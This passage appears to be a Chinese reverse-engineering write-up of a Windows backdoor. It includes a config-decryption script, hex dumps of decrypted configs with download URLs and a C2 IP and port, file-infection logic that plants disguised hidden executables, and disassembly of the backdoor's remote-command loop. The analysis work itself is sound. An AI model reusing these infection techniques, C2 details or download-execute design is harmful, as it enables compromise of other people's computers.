hOutFile.write(real_data)
else:
print "no content found"
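if __name__ == "__main__":
    # Usage: <script> <downloaded page>; writes <page>.decrypt.v next to it.
    if len(sys.argv) != 2:
        print("usage: %s download_config" % sys.argv[0])
        sys.exit(1)
    srcFile = sys.argv[1]
    with open(srcFile, "rb") as hSrc:
        data = hSrc.read()
    dstFile = "%s.decrypt.v" % srcFile
    with open(dstFile, "wb") as hDstFile:
        Decrypt_Config(data, hDstFile)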
大小0x5f
$ ==> >41 10 49 7D 44 4E 46 55 AI}DNFU
$+8 >70 64 61 74 65 30 33 30 pdate030
$+10 >38 2E 65 78 65 00 68 74 8.exe.ht
$+18 >74 70 3A 2F 2F 77 77 77 tp://www
$+20 >2E 31 64 69 73 6B 2E 63 .1disk.c
$+28 >6E 2F 43 6F 6E 74 65 6E n/Conten
$+30 >74 50 61 6E 65 2E 61 73 tPane.as
$+38 >70 78 3F 64 6F 77 6E 3D px?down=
$+40 >6F 6B 26 66 69 6C 65 70 ok&filep
$+48 >61 74 68 3D 74 65 73 74 ath=test
$+50 >37 37 35 38 25 32 66 44 7758%2fD
$+58 >4E 46 2E 64 61 74 00 NF.dat.
解密后的数据,
的结构为:
struct download_config
{
+0 dword first_dword 下载的文件大小
+4 byte byte_4取决于byte_5
+5 byte byte_5
+len(filename) 之后的下载连接
}
如果byte_5是“:”,分两种情况,
byte_4是 “%” ,则下到系统目录
byte_4不是 “%” 则会判断文件是否存在,如果不存在,直接下载到当前目录
如果byte_5不是“:”,从偏移为4 开始作为文件名的一部分下载到临时目录
接下来从
http://home.51.com/?u=test4862&c=diary&a=getdataview&id=10052358
http://hi.baidu.com/test6345/home(下载下来的data并没有########标志,估计是作者已经把配置文件给删了)
http://www.fnsorfnfgsajr.com/test.htm(连接已经失效)
下载配置数据,猜测下载下来的数据很可能是一样的,因为首先是从第一个连接去下载如果下载成功则不会去第二个连接下载,以此类推
从http://home.51.com/?u=test4862&c=diary&a=getdataview&id=10052358下载的数据为:
{
window.modData = {"view":{"id":"10052358","gid":"135189","is_top":"0","heart":"","title":"2010-11-21\u7684\u65e5\u8bb0","memo":"########AKAAAAAAHAHAAAAAAAAAHAHAAAAAAAAA","weekday":"1","show_time":"2010-11-21 19:46:00","flower":"0","egg":"0","ping":"0","click":"4223644","sources":"0","share_flag":"1","share_users":"","hide_comment":"0","share_num":"0","url":"\/test4862\/diary\/item\/10052358.html","_can_view":"1","_desc":"","_putpass":"0","add_time":"1290340014"},"prev":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0a\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u7b2c\u4e00\u7bc7","show_time":"","url":"\/test4862\/diary\/item\/.html"},"next":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0b\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u6700\u540e\u4e00\u7bc7","show_time":"","url":"\/test4862\/diary\/item\/.html"},"catalog":[{"id":"135189","name":"\u6211\u7684\u65e5\u8bb0","hide":"0","url":"\/test4862\/diary\/group\/135189","count":"1"},{"id":"135190","name":"\u6211\u7684\u6587\u7ae0","hide":"0","url":"\/test4862\/diary\/group\/135190","count":"0"},{"id":"135191","name":"\u7f51\u7edc\u6587\u6458","hide":"0","url":"\/test4862\/diary\/group\/135191","count":"0"}],"comment":{"list":{"total":"0","pages":"0","page":"0","rows":[],"userinfo":[]}},"sharelist":[],"lastvisitor":{"rows":[{"nickname":"\u65e0\u804a","face":"http:\/\/static.51img1.com\/sysface\/man_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"1","isopen":"0","user":"vbvbvbzq","_user":"vbvbvbzq","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u6e05\u98ce\u4f9d\u65e7","face":"http:\/\/p4.u.51img1.com\/40\/47\/dis13141998_50.gif?v=20110614170758","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"0","isopen":"0","user":"dis13141998","_user":"dis13141998","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":
"\u95ef\u5165\u8005","face":"http:\/\/p9.u.51img1.com\/9e\/a5\/lilina198787_50.gif?v=20090404160945","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"1","isopen":"0","user":"lilina198787","_user":"lilina198787","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\ufe4f\u53f6\u843d\u65e0\u58f0\u3001","face":"http:\/\/p6.u.51img1.com\/63\/63\/236527861_50.gif?v=20111013151050","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"1","isopen":"0","user":"236527861","_user":"aweiy_z","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""}],"total":"4"},"morediary":[],"current":{"gid":"135189","ghide":"0","gname":"\u6211\u7684\u65e5\u8bb0","gcount":"1","url":"\/test4862\/diary\/group\/135189"}};
}
同样解密算法
返回的大小 0x0a
$ ==> >00 00 00 00 70 70 00 00 ....pp..
$+8 >00 00 ..
$ ==> 00900020 00 00 00 00 70 70 00 00 ....pp..
$+8 00900028 00 00 70 70 00 00 00 00 ..pp....
$+10 00900030 EF 37 66 A3 3B FF FF EF ?f?
$+18 00900038 33 7E 7F 3A E6 FF FF FF 3~:?
$+20 00900040 EE FF FF FF FF FF FF EF ?
$+28 00900048 EF 37 BE 66 EF EF EF EF ?緁镲镲
$+30 00900050 66 FF EF EF EF FA F6 FF f镲嵇?
$+38 00900058 EF EF 32 BA 2A FF FF FF 镲2?
$+40 00900060 FF FF EF 33 F7 32 73 FF ??s
$+48 00900068 EF EF 33 72 36 E7 B2 FF 镲3r6绮
$+50 00900070 EF FF EF 27 33 5F 73 73 ??3_ss
$+58 00900078 FF EF EF 37 A3 5F 2E EE 镲7.
$+60 00900080 6F EF EF EF EF 27 33 5F o镲镲'3_
$+68 00900088 F7 FF EF EF EF 73 ?镲飐镲
struct confif_data_for_backdoor
{
+0 dword 判断是否需要从其他链接中下载配置文件 如果为0 则表示需要 赋值给00401854
+4 word 赋值给00401852
+6 word 扩充为dword赋值给00401844
+8 dword control_flag 与dword(0040184c)相或 赋值给00401848 控制接下来的行为 0040184c初始为0 或得结果为70700000
但是解密返回来的大小只有0xa,如果+8处真是一个dword,显然已经超出了这个范围,我们回头看看其解密过程的末尾
.text:00401AC5 mov ecx, [ebp+first_dword_after_decrypt]
.text:00401AC8 mov edi, [ebp+arg_0_read_data]
.text:00401ACB mov esi, edi
.text:00401ACD add esi, 6
.text:00401AD0 rep movsb
显然它把解密后的数据从偏移6开始向前(向低地址)覆盖了,所以偏移+a处的word就是偏移+4处的word,即0x7070
}
看看控制的相关代码
text:004050CD execute_command_accordingto_dword_flag proc near
.text:004050CD ; CODE XREF: net_activity+102p
.text:004050CD ; net1+1C4p
.text:004050CD
.text:004050CD arg_0_confif_data_for_backdoor_jia_c= dword ptr 8
.text:004050CD arg_4_0x1000 = dword ptr 0Ch
.text:004050CD
.text:004050CD 55 push ebp
.text:004050CE 8B EC mov ebp, esp
.text:004050D0 ; nop code
.text:004050D7 B8 48 18 40 00 mov eax, 401848h
.text:004050DC F7 00 00 00 00 10 test dword ptr [eax], 10000000h
.text:004050E2 74 0D jz short loc_4050F1
.text:004050E4 FF 75 0C push [ebp+arg_4_0x1000]
.text:004050E7 FF 75 08 push [ebp+arg_0_confif_data_for_backdoor_jia_c]
.text:004050EA E8 2A 0E 00 00 call Download_file_execute
.text:004050EF EB 21 jmp short loc_405112
.text:004050F1 ; nop code
.text:004050F8 B8 48 18 40 00 mov eax, offset unk_401848
.text:004050FD F7 00 00 00 00 20 test dword ptr [eax], 20000000h
.text:00405103 74 0D jz short loc_405112
.text:00405105 FF 75 0C push [ebp+arg_4_0x1000]
.text:00405108 FF 75 08 push [ebp+arg_0_confif_data_for_backdoor_jia_c]
.text:0040510B E8 17 1B 00 00 call CreateFile_Exuecute
.text:00405110 EB 00 jmp short $+2
.text:00405112 ; nop code
.text:00405119 B8 48 18 40 00 mov eax, offset unk_401848
.text:0040511E F7 00 00 00 00 40 test dword ptr [eax], 40000000h
.text:00405124 74 05 jz short locret_40512B
.text:00405126 E8 47 E6 FF FF call Infect_with_flag__
.text:0040512B
.text:0040512B locret_40512B: ; CODE XREF: execute_command_accordingto_dword_flag+57j
.text:0040512B C9 leave
.text:0040512C C2 08 00 retn
if (control_flag & 0x10000000)
下载执行,其中连接由confif_data_for_backdoor+c 指定
goto infect
if (control_flag & 0x20000000)
如果有% 则直接用系统盘替换%
否则,在系统目录下创建文件 文件名由confif_data_for_backdoor+c 指定
goto infect
infect:
if (control_flag & 0x40000000)
if (control_flag & 0x00000001)
{
40000101 删除doc后缀同名的文件 删除与文件夹同名的文件 删除inf文件
40000081 什么也不做
40000021 写入与文件夹同名的exe 保证图标与文件夹图标一致 属性为FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM
40000041 写入与doc同名的exe 保证图标与doc文档图标一致 属性为FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM
40000009 如果标志位为40000208 则不检查是否被感染直接感染 主要针对dll文件
40000011 如果标志位为40000410 则不检查是否被感染直接感染 主要针对exe文件
}
if (control_flag & 0x00000002)
枚举各个盘符只感染如下文件
'RarExt.dll',0
'ppsap.exe',0
'procdll.dll',0
'thunders.dll',0
'Storm.dll',0
前面说过了
confif_data_for_backdoor的第一个dword决定了是否继续下载配置文件,我们下载下来的dword为0,所以其会继续从下面的链接下载:
http://home.51.com/?u=lichao3596&c=diary&a=getdataview&id=10047625
下载的数据为:
{
window.modData = {"view":{"id":"10047625","gid":"133252","is_top":"0","heart":"","title":"2010-11-21\u7684\u65e5\u8bb0","memo":"########DLAAAAAAFFCENOKOHDJLHAHAEAAABPABAAGACFDKFMFAHCGPGHHCGBGNCAEGGJGMGFHDFMFEGFGOGDGFGOHEFMFBFBFMENFBFBFCGFHDFMFBFBENHFHDGJGDCOGFHIGFAA","weekday":"1","show_time":"2010-11-21 16:25:00","flower":"0","egg":"0","ping":"0","click":"4216665","sources":"0","share_flag":"1","share_users":"","hide_comment":"0","share_num":"0","url":"\/lichao3596\/diary\/item\/10047625.html","_can_view":"1","_desc":"","_putpass":"0","add_time":"1290327905"},"prev":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0a\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u7b2c\u4e00\u7bc7","show_time":"","url":"\/lichao3596\/diary\/item\/.html"},"next":{"id":"0","gid":"0","title":"\u6682\u65e0\u4e0b\u4e00\u7bc7,\u5f53\u524d\u6b63\u662f\u6700\u540e\u4e00\u7bc7","show_time":"","url":"\/lichao3596\/diary\/item\/.html"},"catalog":[{"id":"133252","name":"\u6211\u7684\u65e5\u8bb0","hide":"0","url":"\/lichao3596\/diary\/group\/133252","count":"1"},{"id":"133253","name":"\u6211\u7684\u6587\u7ae0","hide":"0","url":"\/lichao3596\/diary\/group\/133253","count":"0"},{"id":"133254","name":"\u7f51\u7edc\u6587\u6458","hide":"0","url":"\/lichao3596\/diary\/group\/133254","count":"0"}],"comment":{"list":{"total":"0","pages":"0","page":"0","rows":[],"userinfo":[]}},"sharelist":[],"lastvisitor":{"rows":[{"nickname":"\u65e0\u804a","face":"http:\/\/static.51img1.com\/sysface\/man_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/man.gif","viplink":"","isconfirm":"1","isopen":"0","user":"vbvbvbzq","_user":"vbvbvbzq","sex":"\u5148\u751f","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u95ef\u5165\u8005","face":"http:\/\/p9.u.51img1.com\/9e\/a5\/lilina198787_50.gif?v=20090404160945","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"1","isopen":"0","user":"lilina198787","_user":"lilina198787"
,"sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"\u71a0","face":"http:\/\/p3.u.51img1.com\/39\/75\/yilin261010107_50.gif?v=20090528094841&cool=0","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"1","isopen":"0","user":"yilin261010107","_user":"yilin261010107","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"54243","face":"http:\/\/static.51img1.com\/sysface\/woman_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"0","user":"237955579","_user":"5759497","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""},{"nickname":"Amu2730","face":"http:\/\/static.51img1.com\/sysface\/woman_none_50.jpg","sexpic":"http:\/\/static.51img1.com\/v3\/themes\/skins\/images\/woman.gif","viplink":"","isconfirm":"0","isopen":"0","user":"amu2730","_user":"amu2730","sex":"\u5973\u58eb","prov":"","guestlevel":"","vconfirm":"","vconfirmbg":"","vconfirmword":""}],"total":"5"},"morediary":[],"current":{"gid":"133252","ghide":"0","gname":"\u6211\u7684\u65e5\u8bb0","gcount":"1","url":"\/lichao3596\/diary\/group\/133252"}};
}
解密后的数据为:
返回的大小为0x3b
$ ==> >DE AE 73 9B 70 70 40 00 蕻s沺p@.
$+8 >1F 01 00 60 25 3A 5C 50 .`%:\P
$+10 >72 6F 67 72 61 6D 20 46 rogram F
$+18 >69 6C 65 73 5C 54 65 6E iles\Ten
$+20 >63 65 6E 74 5C 51 51 5C cent\QQ\
$+28 >4D 51 51 52 65 73 5C 51 MQQRes\Q
$+30 >51 4D 75 73 69 63 2E 65 QMusic.e
$+38 >78 65 00 63 2E 65 78 65 xe.c.exe
$+40 >00 EF 37 66 A3 3B FF FF .?f?
$+48 >EF 33 7E 7F 3A E6 FF FF ?~:?
$+50 >FF EE FF FF FF FF FF FF ?
这个结构体和前面的结构体解析是一样的 不过这里的第一个dword 不是作为标志了 而是一个ip地址,用来连接执行后门功能的
其中
00401850指向一个sockaddr
struct confif_data_for_backdoor
{
+0 dword ip_address 赋值给00401854
+4 word port 赋值给00401852
+6 word 扩充为dword赋值给00401844
+8 dword control_flag 与dword(0040184c)相或 赋值给00401848 控制接下来的行为 0040184c初始为0 或得结果为6000011F
}
根据前面的分析 可知道该control_flag 执行的功能为:
创建系统盘:\Program Files\Tencent\QQ\MQQRes\QQMusic.exe
{
40000101 删除doc后缀同名的文件 删除与文件夹同名的文件 删除inf文件
40000008 如果标志位为40000208 则不检查是否被感染直接感染 主要针对dll文件
40000010 如果标志位为40000410 则不检查是否被感染直接感染 主要针对exe文件
}
枚举各个盘符只感染如下文件
.text:00401B71 52 61 72 45 78 74+String1 db 'RarExt.dll',0 ; DATA XREF: infect_pe+CAo
.text:00401B7C 70 70 73 61 70 2E+aPpsap_exe_0 db 'ppsap.exe',0
.text:00401B86 70 72 6F 63 64 6C+aProcdll_dll db 'procdll.dll',0
.text:00401B92 74 68 75 6E 64 65+aThunders_dll db 'thunders.dll',0
.text:00401B9F 53 74 6F 72 6D 2E+aStorm_dll db 'Storm.dll',0
由配置文件可知其连接的ip为:
222.174.115.155 端口为0x7070
执行后门功能的主要线程地址为:
0040512f
该线程在@recv处循环调用recvfrom接收数据,先检查读到的长度非0且不超过0x4B0,再比较来源地址中的ip与sockaddrr+4处(即配置中的ip_address)是否一致,不一致的数据包直接丢弃,一致则按缓冲区第一个字节分发到各个命令处理分支
后门的功能包括:
获取系统网络信息
下载执行文件
感染pe文件
获取进程列表
杀进程
删除和拷贝文件
截屏
更新ip地址和端口
还会记录计算机名等其他信息到注册表
等等
代码:
.text:0040512F sub_40512F proc near ; DATA XREF: @net_activity_start+4Do
.text:0040512F
.text:0040512F read_size = dword ptr -5F4h
.text:0040512F fromlen = dword ptr -5F0h
.text:0040512F from = sockaddr ptr -5ECh
.text:0040512F buf = byte ptr -5DCh
.text:0040512F s = dword ptr 8
.text:0040512F
.text:0040512F push ebp
.text:00405130 mov ebp, esp
.text:00405132 add esp, 0FFFFFA0Ch
.text:00405138 mov [ebp+fromlen], 10h
.text:00405142
.text:00405142 @recv: ; CODE XREF: sub_40512F+6Ej
.text:00405142 ; sub_40512F+DCj ...
.text:00405142 lea eax, [ebp+fromlen]
.text:00405148 push eax ; fromlen
.text:00405149 lea eax, [ebp+from]
.text:0040514F push eax ; from
.text:00405150 push 0 ; flags
.text:00405152 push 4B0h ; len
.text:00405157 lea eax, [ebp+buf]
.text:0040515D push eax ; buf
.text:0040515E push [ebp+s] ; s
.text:00405161 ; nop code
.text:00405169 call recvfrom
.text:0040516F test eax, eax ; eax = number of bytes to read
.text:00405171 jz @reand_data_is_zero_ro_toobig
.text:00405177 cmp eax, 4B0h
.text:0040517C ja @reand_data_is_zero_ro_toobig
.text:00405182 mov [ebp+read_size], eax
.text:00405188 ; nop code
.text:0040518F mov eax, offset sockaddrr
.text:00405194 mov eax, [eax+4]
.text:00405197 cmp eax, dword ptr [ebp+from.sa_data+2]
.text:0040519D jnz short @recv
.text:0040519F xor eax, eax
.text:004051A1 mov al, [ebp+buf]
.text:004051A7 cmp eax, 4
.text:004051AA jz short @first_byte_is_4
.text:004051AC cmp eax, 3
.text:004051AF jz short loc_405223
.text:004051B1 cmp eax, 1
.text:004051B4 jz @first_byte_is_1
.text:004051BA cmp eax, 9
.text:004051BD jz @first_byte_is_9
.text:004051C3 cmp eax, 0Ah
.text:004051C6 jz @first_byte_is_a
.text:004051CC cmp eax, 0Ch
.text:004051CF jz @first_byte_is_c
.text:004051D5 cmp eax, 6
.text:004051D8 jz @first_byte_is_6
.text:004051DE cmp eax, 0Dh
.text:004051E1 jz @First_byte_is_D
.text:004051E7 cmp eax, 0Eh
.text:004051EA jz @first_byte_is_e
.text:004051F0 cmp eax, 0Fh
.text:004051F3 jz @first_byte_is_f
.text:004051F9 cmp eax, 10h
.text:004051FC jz @first_byte_is_10
.text:00405202 cmp eax, 11h
.text:00405205 jz @first_byte_is_11
.text:0040520B jmp @recv
.text:00405210 ; ---------------------------------------------------------------------------
.text:00405210
.text:00405210 @first_byte_is_4: ; CODE XREF: sub_40512F+7Bj
.text:00405210 push 8
.text:00405212 lea eax, [ebp+buf+1]
.text:00405218 push eax
.text:00405219 call Get_mcname_in_reg
.text:0040521E jmp @recv
.text:00405223 ; ---------------------------------------------------------------------------
.text:00405223
.text:00405223 loc_405223: ; CODE XREF: sub_40512F+80j
.text:00405223 mov eax, [ebp+read_size]
.text:00405229 dec eax
.text:0040522A push eax
.text:0040522B lea eax, [ebp+buf+1]
.text:00405231 push eax
.text:00405232 call Set_mcname_in_reg
.text:00405237 jmp @recv
.text:0040523C ; nop code
.text:00405243 mov eax, offset unk_40188C
.text:00405248 cmp dword ptr [eax], 0
.text:0040524B jnz short loc_405273
.text:0040524D mov eax, dword ptr [ebp+buf+5]
.text:00405253 push eax
.text:00405254 mov eax, dword ptr [ebp+buf+1]
.text:0040525A test eax, eax
.text:0040525C jnz short loc_40526D
.text:0040525E ; nop code
.text:00405265 mov eax, offset sockaddrr
.text:0040526A mov eax, [eax+4]
.text:0040526D
.text:0040526D loc_40526D: ; CODE XREF: sub_40512F+12Dj
.text:0040526D push eax
.text:0040526E call backdoor
.text:00405273
.text:00405273 loc_405273: ; CODE XREF: sub_40512F+11Cj
.text:00405273 jmp @recv
.text:00405278 ; ---------------------------------------------------------------------------
.text:00405278
.text:00405278 @first_byte_is_9: ; CODE XREF: sub_40512F+8Ej
.text:00405278 call query_data_in_reg_send_out
.text:0040527D jmp @recv
.text:00405282 ; ---------------------------------------------------------------------------
.text:00405282
.text:00405282 @first_byte_is_a: ; CODE XREF: sub_40512F+97j
.text:00405282 mov eax, [ebp+read_size]
.text:00405288 dec eax
.text:00405289 push eax
.text:0040528A lea eax, [ebp+buf+1]
.text:00405290 push eax
.text:00405291 call Save_recv_data_to_reg
.text:00405296 jmp @recv
.text:0040529B ; ---------------------------------------------------------------------------
.text:0040529B
.text:0040529B @first_byte_is_c: ; CODE XREF: sub_40512F+A0j
.text:0040529B call Send_sysinfo
.text:004052A0 jmp @recv
.text:004052A5 ; ---------------------------------------------------------------------------
.text:004052A5
.text:004052A5 @first_byte_is_6: ; CODE XREF: sub_40512F+A9j
.text:004052A5 call Close_Socket
.text:004052AA jmp @recv
.text:004052AF ; ---------------------------------------------------------------------------
.text:004052AF
.text:004052AF @First_byte_is_D: ; CODE XREF: sub_40512F+B2j
.text:004052AF push 3E8h
.text:004052B4 lea eax, [ebp+buf+1]
.text:004052BA push eax
.text:004052BB call Download_File_Execute_
.text:004052C0 jmp @recv
.text:004052C5 ; ---------------------------------------------------------------------------
.text:004052C5
.text:004052C5 @first_byte_is_e: ; CODE XREF: sub_40512F+BBj
.text:004052C5 lea eax, [ebp+buf+1]
.text:004052CB push eax
.text:004052CC call Exec
.text:004052D1 jmp @recv
.text:004052D6 ; ---------------------------------------------------------------------------
.text:004052D6
.text:004052D6 @first_byte_is_f: ; CODE XREF: sub_40512F+C4j
.text:004052D6 push 3E8h
.text:004052DB lea eax, [ebp+buf+1]
.text:004052E1 push eax
.text:004052E2 call Download_File_Execute
.text:004052E7 jmp @recv
.text:004052EC ; ---------------------------------------------------------------------------
.text:004052EC
.text:004052EC @first_byte_is_10: ; CODE XREF: sub_40512F+CDj
.text:004052EC lea eax, [ebp+buf+1]
.text:004052F2 push eax
.text:004052F3 call Delete_FILE_IN_TMP
.text:004052F8 jmp @recv
.text:004052FD ; ---------------------------------------------------------------------------
.text:004052FD
.text:004052FD @first_byte_is_11: ; CODE XREF: sub_40512F+D6j
.text:004052FD push 3E8h
.text:00405302 lea eax, [ebp+buf+1]
.text:00405308 push eax
.text:00405309 call Download_File
.text:0040530E jmp @recv
.text:00405313 ; nop code
.text:0040531A mov eax, offset unk_401860
.text:0040531F cmp dword ptr [eax], 0FFFFFFFFh
.text:00405322 jz short @retn
.text:00405324 push 3E8h ; dwMilliseconds
.text:00405329 ; nop code
.text:00405331 ; ---------------------------------------------------------------------------
.text:00405331 call Sleep
.text:00405337 jmp @recv
.text:0040533C ; nop code
.text:00405343 mov eax, 401888h
.text:00405348 mov dword ptr [eax], 0
.text:0040534E leave
.text:0040534F retn 4
.text:0040534F sub_40512F endp